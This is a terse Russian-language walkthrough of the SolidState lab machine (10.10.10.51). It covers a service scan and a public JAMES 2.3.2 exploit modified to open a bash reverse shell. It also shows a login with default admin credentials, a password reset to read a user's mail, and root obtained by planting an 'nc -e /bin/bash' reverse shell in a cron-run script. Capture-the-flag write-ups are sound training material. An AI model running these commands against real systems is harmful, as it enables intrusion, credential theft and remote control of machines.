Обзор сервисов
$ nmapAutomator.sh -H 10.10.10.51 -t Full
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.4p1 Debian 10+deb9u1 (protocol 2.0)
| ssh-hostkey:
| 2048 77:00:84:f5:78:b9:c7:d3:54:cf:71:2e:0d:52:6d:8b (RSA)
| 256 78:b8:3a:f6:60:19:06:91:f5:53:92:1d:3f:48:ed:53 (ECDSA)
|_ 256 e4:45:e9:ed:07:4d:73:69:43:5a:12:70:9d:c4:af:76 (ED25519)
25/tcp open smtp JAMES smtpd 2.3.2
|_smtp-commands: solidstate Hello nmap.scanme.org (10.10.14.6 [10.10.14.6]),
80/tcp open http Apache httpd 2.4.25 ((Debian))
|_http-server-header: Apache/2.4.25 (Debian)
|_http-title: Home - Solid State Security
110/tcp open pop3 JAMES pop3d 2.3.2
119/tcp open nntp JAMES nntpd (posting ok)
4555/tcp open rsip?
| fingerprint-strings:
| GenericLines:
| JAMES Remote Administration Tool 2.3.2
| Please enter your login and password
| Login id:
| Password:
| Login failed for
|_ Login id:
Service Info: Host: solidstate; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Публичный эксплоит
searchsploit james => 35513.py
Меняем нагрузку на /bin/bash -i >& /dev/tcp/10.10.14.6/1234 0>&1.
$ telnet 10.10.10.51 4555
root:root
$ listusers
user: james
user: thomas
user: john
user: mindy
user: mailadmin
$ setpassword mindy 1234
python 35513.py 10.10.10.51
nc -lnvp 1234
Проверяем POP3 почту для пользователя mindy.
telnet 10.10.10.51 110
USER mindy
PASS 1234
LIST
RETR 2
=> получаем креды для SSH mindy:P@55W0rd1!2@.
Ограниченный шелл
ssh [email protected] => ловим nc -lnvp 1234
Флаг пользователя
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ ip addr
ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:cd:0b brd ff:ff:ff:ff:ff:ff
inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cd0b/64 scope global mngtmpaddr dynamic
valid_lft 86166sec preferred_lft 14166sec
inet6 fe80::250:56ff:feb9:cd0b/64 scope link
valid_lft forever preferred_lft forever
${debian_chroot:+($debian_chroot)}mindy@solidstate:~$ cat user.txt
cat user.txt
0510e71c2e8c9cb333b36a38080d0dc2
linenum.sh
=>/opt/tmp.py выглядит как скрипт, который регулярно выполняет os.system():
nc -lnvp 1235
Пишем нагрузку в файл /opt/tmp.py => os.system("nc -e /bin/bash 10.10.14.6 1235").
Флаг суперпользователя
$ ip addr
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1
link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
inet 127.0.0.1/8 scope host lo
valid_lft forever preferred_lft forever
inet6 ::1/128 scope host
valid_lft forever preferred_lft forever
2: ens192: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc mq state UP group default qlen 1000
link/ether 00:50:56:b9:cd:0b brd ff:ff:ff:ff:ff:ff
inet 10.10.10.51/24 brd 10.10.10.255 scope global ens192
valid_lft forever preferred_lft forever
inet6 dead:beef::250:56ff:feb9:cd0b/64 scope global mngtmpaddr dynamic
valid_lft 86081sec preferred_lft 14081sec
inet6 fe80::250:56ff:feb9:cd0b/64 scope link
valid_lft forever preferred_lft forever
$ cat root.txt
4f4afb55463c3bc79ab1e906b074953d